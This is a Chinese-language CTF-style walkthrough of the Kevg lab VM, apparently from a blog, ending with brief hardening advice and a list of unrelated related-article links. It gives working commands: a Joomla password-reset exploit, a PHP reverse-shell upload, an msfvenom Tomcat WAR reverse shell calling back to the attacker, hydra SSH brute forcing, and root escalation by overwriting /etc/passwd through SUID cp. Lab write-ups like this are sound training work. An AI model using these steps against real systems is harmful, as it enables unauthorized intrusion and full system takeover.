一、信息搜集

先使用ifconfig查看本机ip:

用nmap工具扫描本机ip段下的主机:

发现目标靶机ip为192.168.152.134
查看目标靶机开放了哪些端口:

发现80,8080,8081,9000端口上开放了HTTP服务,1322端口开放了SSH服务,可以作为漏洞突破点

二、外网突破

  1. 对于8081端口进行突破

通过搜索可以发现,有一个对于此系统的漏洞扫描工具joomscan,扫描此网页:

有很多此系统的漏洞,这里我选择CVE-2008-3681,是远程修改密码,通过点击链接进入,发现已经给出实例:

我们用这种方法尝试对于8081端口进行修改
先输入192.168.152.134:8081/index.php?option=com_user&view=reset&layout=confirm,输入令牌为“’”,修改password,我设置为admin

通过admin账户和刚修改的密码登入系统

我们通过template manager中的beez来上传反弹shell的php代码,通过查看本机的文件发现自带的有php-reverse-shell.php

修改其中的ip为主机ip,端口设置为1234

上传成功后我们用nc工具监听我们的1234端口,同时访问该文件的网页

python3 -c 'import pty;pty.spawn("/bin/bash")' 来转化为交互式shell,至此获得了shell

  1. 8080端口渗透
    查看网页,tomcat7

使用nikto扫描网页 nikto -h http://192.168.211.134:8080

发现tomcat的弱口令ID:tomcat PW:tomcat,找到管理页并登入

登陆之后

发现可以上传war包, 这里我们可以通过上传一个反弹 shell的war,然后再监听端口,从而拿到shell的控制权

用kali生成一个war并上传
Msfvenom -p java/jsp_shell_reverse_tcp LHOST = 192.168.211.131 LPORT = 1111 war > a_jsp_shell_1111.war

访问http://192.168.211.134:8080/a_jsp_shell_1111/
监听1111端口得到shell

  1. 1322端口
    首先通过nmap扫描靶机信息:

发现1322端口运行的是ssh协议,又发现其版本为OPENSSH 6.6.lpl通过msfconsole查询openssh的漏洞:

我们使用第3个漏洞,是用于枚举服务器存在的用户的

设置目标主机和端口,同时设置要爆破用用户名字典,使用的为kali自带的/usr/share/wordlists/metasploit/piata_ssh_userpass.txt,设置成功查看options

成功后开始run执行,记录搜索出来的用户名

用hydra进行弱口令爆破admin的密码为admin

通过ssh远程登录靶机的shell

成功获取shell

三、权限提升

通过find / -perm -u=s -type f 2>/dev/null查找系统中赋予了s权限的程序

我们通过cat etc/passwd查看发现,有root,admin,user三个用户可以是使用

由于我们权限无法直接访问etc/shadow,所以我们使用之前发现的有s权限的cp命令将其复制到tmp目录下查看

发现三个用户名的密码,是密文。将admin信息复制到kali桌面文件夹保存

用john工具进行密码爆破,由于之前爆破过,报告中我们直接show其结果

得到admin账户的密码为admin
我们在自己的kali中添加admin用户,并将其用户id和组id设置为0

在主机中搭建一个简单的http服务器,端口号默认设置为8000

由于靶机中/tmp文件不需要高权限,所以我们把kali主机中的passwd下载到靶机中的tmp中

由于cp具有root权限,所以我们用cp把下载的passwd覆盖靶机中原/etc/passwd,此时admin的权限为root

我们su admin切换用户,使用id和whoami确认奕获得root权限,至此提权成功

四、 系统防护

  1. 在获得admin的密码的时候,使用到了哈希值爆破密码,我们可以使用对于密码明文加密后的哈希值再次进行加密得到一个“哈希值的哈希值”,这样可以有效的防止如john等hash值爆破工具轻松的破解出明文密码。
  2. 文件上传漏洞是攻击者通过上传⽊马⽂件,直接得到,危害等级超级⾼,现在的⼊侵中上传漏洞也是常见的漏洞。导致该漏洞的原因在于代码作者没有对访客提交的数据进⾏检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。建议对⽂件格式限制,只允许某些格式上传。
  3. 权限提升。权限提升是指利⽤系统中的或是别的⽅法使得⾃⼰突破了原来的限制,能够⾮法访问对⽅⽬录甚⾄是使得⾃⼰能够向那样来获取整个权限。 建议:1.定期进⾏固件、中间件的升级。不要给用户设置⼯作之外的权限。对⽂件格式限制,只允许某些格式上传。
  4. 弱口令爆破漏洞。应用存在默认口令或口令较简单易被猜到。会被一些弱口令爆破工具得到口令。建议一是设置更为复杂的口令,使得爆破口令变得困难,二是一段时间要更换新的口令,防止攻击者利用爆破的口令多次入侵系统。

Kevg靶机渗透实现 8080端口 8081端口 1322端口实现相关推荐

  1. 已解决:Window11问题 8080、8081、8082端口占用问题 Port 808X was already in use.

    Port 8080 was already in use. Port 8081 was already in use. Port 8082 was already in use. Window11 打 ...

  2. 渗透小技巧从getshell到3389端口远程桌面连接靶机

    目录 1.靶场环境 2.永恒之蓝漏洞Getshell 3.命令行打开3389远程连接端口 4.命令行添加登录用户 5.Kali自带远程连接工具进行连接 5.1.xfreerdp工具 5.2.xfree ...

  3. 安全测试(三) 服务器安全 渗透测试 常规服务器安全漏洞 高危端口暴露、弱口令密码、暴力破解、服务器提权、Mysql数据库提权等 浅谈《社会工程学》实战案例

    文章目录 一.前言 二.服务器安全 高危端口 2.1 端口号(Port number) 2.2 常见端口后及其用途表 2.3 端口号 扫描工具介绍 2.4 端口号 端口说明 攻击技巧 2.5 安全警示 ...

  4. 渗透知识- Windows系统目录、服务、端口、注册表

    1.系统目录 Windows:是Windows系统安装文件所在文件夹,一般用来存储系统安装文件和硬件驱动程序等内容,是系统正常运转的必要保证. Program Files:指的是程序文件,是Windo ...

  5. php80端口改成8080,jetty,_JETTY 8080端口改为80端口无法访问,jetty - phpStudy

    JETTY 8080端口改为80端口无法访问 JETTY最初安装时候配置的是8080端口,域名备案成功以后将8080端口改为了80,并重启了服务器.但访问仍然是8080才可以访问,80端口无法访问.运 ...

  6. Linux放行单个8080端口和放行8000-9000端口区间

    Linux放行单个8080端口和放行8000-9000端口区间 前言 防火墙是借助硬件和软件对内外部网络环境的保护措施 CentOs7借助firewall实现应用层防火墙,CentOs6基于iptab ...

  7. CentOS /Linux 开放80、8080端口或者开放某个端口

    CentOS /Linux 开放80.8080端口或者开放某个端口 方式一 开放端口 查看防火墙设置发现没开启80端口 iptables -L -n 修改端口配置文件 vim /etc/sysconf ...

  8. Tomcat配置8080强制跳转https端口变成8443或者80跳转443

    Tomcat配置强制https端口变成8443 跳转端口: http默认端口 8080 https默认端口 8443 或者 http默认端口 80 https默认端口 443 这里只讲tomcat配置 ...

  9. 【Kali渗透全方位实战】使用Nmap进行端口探测-发现脆弱站点

    文章目录 1 摘要 2 Nmap作用 3 常用Nmap扫描指令 4 端口扫描状态 5 TCP/IP协议与Http协议的区别 6 使用Nmap探测目标开放端口 1 摘要 一 端口是个网络应用中很重要的东 ...

最新文章

  1. Django web框架
  2. Java操作oracle数据库
  3. Polygon 年度游戏之《巴巴是你》:解读纯粹的游戏乐趣
  4. HihoCoder - 1828 Saving Tang Monk II(bfs+动态规划/bfs+优先队列)
  5. jakarta ee_在等待Jakarta EE时
  6. 并发优化–减少锁粒度
  7. Joi验证模块的使用
  8. 罗宾斯管理学13版pdf_全球著名管理学家,曾任五大高校教授,罗宾斯教你如何做好管理者...
  9. oracle查看角色内容,oracle创建,查看用户和角色,用户角色赋权
  10. centos7安装python3.6独立的virtualenv环境
  11. 项目的webinf文件在哪_PMP章节练习(第四章:项目整合管理)
  12. 文件内容快速搜索工具(Everything、Listary、DocFetcher)下载
  13. cmd 卸载mysql_彻底卸载MySQL图文教程
  14. 点聚AIP电子签章在Chrome、Edge新内核、360系列、FireFox、IE、Opera等浏览器中实现网页内嵌效果案例(一)
  15. matlab 的滤波器分析,基于MATLAB仿真软件对有源滤波器进行分析研究
  16. linux内存速度测试命令dd,Linux 中用 dd 命令来测试硬盘读写速度
  17. 逆地址解析-【高德地图】【腾讯地图】
  18. linux文件同步方法,inotify + rsync实现linux文件实时同步
  19. hadoop 不能加载native-hadoop library问题
  20. 中止执行后超过2年_失信被执行人怎么撤销 超过两年会撤销吗

热门文章

  1. TabLayout的使用详解
  2. 爬了1000张清纯妹子私房照,我流鼻血了...
  3. JS函数自定义弹窗;纯JS实现弹窗
  4. Surf函数调节图像方法
  5. CSS样式自动换行(总结)
  6. 常见数据结构在内存中是怎么存储的
  7. matlab中绘制图像
  8. SSM多表联查,原来如此方便,快捷!!!
  9. 上网本 linux中文版,veket|veket linux上网本操作系统 v5.30 简体中文正式版 - 飞极下载站...
  10. reset master和reset slave解析